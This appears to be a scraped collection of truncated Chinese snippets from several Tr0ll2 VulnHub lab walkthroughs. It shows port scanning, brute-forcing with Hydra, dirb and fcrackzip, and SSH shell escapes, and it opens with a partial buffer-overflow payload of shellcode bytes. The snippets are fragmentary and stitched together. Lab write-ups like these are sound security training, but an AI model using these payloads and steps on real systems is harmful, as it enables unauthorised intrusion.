r $(python -c 'print "A" * 268 + "BBBB" + "\x90" * 16 + "\xbf\xa2\x06\x41\x9a\xda\xd2\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x0b\x83\xe8\xfc\x31\x78\x11\x03\x78\x11\xe2\x57\x6c\x4a\xc2\x0e\x23\x2a\x9a\x1d\xa7\x3b\xbd\x35\x08\x4f\x2a\xc5\x3e\x80...
可以看到有root可疑文件,运行不同的root文件,发现需要传入参数,输入500个A,测试到door2中r00t会崩溃,是我们需要的,抠出来: 接下来用ida打开分析一下: 可以看到这是一个缓冲区溢出漏洞,生成随机字符串: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad...
现在汇总收集到的信息:一个用户名tr0ll,一个密码字典,那么很容易想到通过密码字典爆破ftp或ssh 但是用hydra爆破了一下,发现进不去。 后来灵光一闪,用默认的用户名当密码,tr0ll、tr0ll结果直接进去了: 打开发现一个压缩包,下载下来解压发现需要密码 那估计密码字典是解压密码了,爆破一下试试: 使用fcrackzip工具(...
更多靶机下载及其背景故事:https://www.vulnhub.com/ 这个看名字就知道是第四篇靶机的续作,第四篇靶机Tr0ll 环境: 物理机:win11(因为kali linux字有点小) 攻击主机:kali linux2021.3 被攻击主机:Tr0ll2 开始前将两个主机配置到同一网段。 设置方法:文章靶机使用前的一些配置方法 - 哔哩哔哩 (bilibili.com) ...
项目九:Tr0ll2 ##Nmap存活主机发现 ---靶机IP:192.168.95.155 ---全端口扫描 ---指定端口扫描:没有发现什么有用的信息 ---思路1:通过ftp和Web收集用户名和密码,爆破SSH ---思路2:通过ftp和Web,获取WebShell ---小米范系列工具的介绍与下载(存活主机扫描要求Java1.8,我的是java11): ...
Tr0ll2 Tr0ll2 nmap扫描端口: FTP枚举: 发现lmao.zip文件,下载后进行解压发现需要密码,无法爆破,找密码。 dirb目录爆破: 查看robots.txt 将robots.txt下载下来,进行爆破: 查看这几个目录,发现都是同一张图片,查看源码发现,其中存在cat_the_troll.jpg,查看http://192.168.137.143/dont_bother/cat_the_troll....
VulnHub靶场系列-Tr0ll2 技术标签:安全linux 主机:192.168.136.133 靶机:192.168.136.158 先用nmap扫描网段发现目标主机以及其开放的端口和服务 登陆主页 按照惯例查看一下源代码 发现一个有用的信息Author:Tr0ll,试一下利用这个能不能登上ftp 下载这个压缩包但是提示需要密码解压 然后再深层次扫描一下看看有没有...
红队渗透项目之Tr0ll2 十七Seven 关注 漏洞 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4...
运行root文件,需要传入参数,输入500个A,测试到door2中r00t会崩溃,是目标文件,获取后进行分析。使用IDA工具对文件进行分析,发现是缓冲区溢出漏洞。生成随机字符串,尝试链接服务器,发现文件目录更改。确认溢出点,执行调试,确定异常点位置。构造payload,填充滑板指令,确定esp地址,开始构建EXP。执行EXP...
root@NightsWatch:~/Desktop/tr0ll# file noob noob: PEM RSA private key 0x04 SSH Service 猜测是不是SSH登陆密钥: 看到提示运行的是/usr/bin/xauth,并不是/bin/bash,这里有几种方法: ssh -i noob noob@192.168.8.126 -t "/bin/sh" ssh -i noob noob@192.168.8.126 -t "bash --noprofile" ...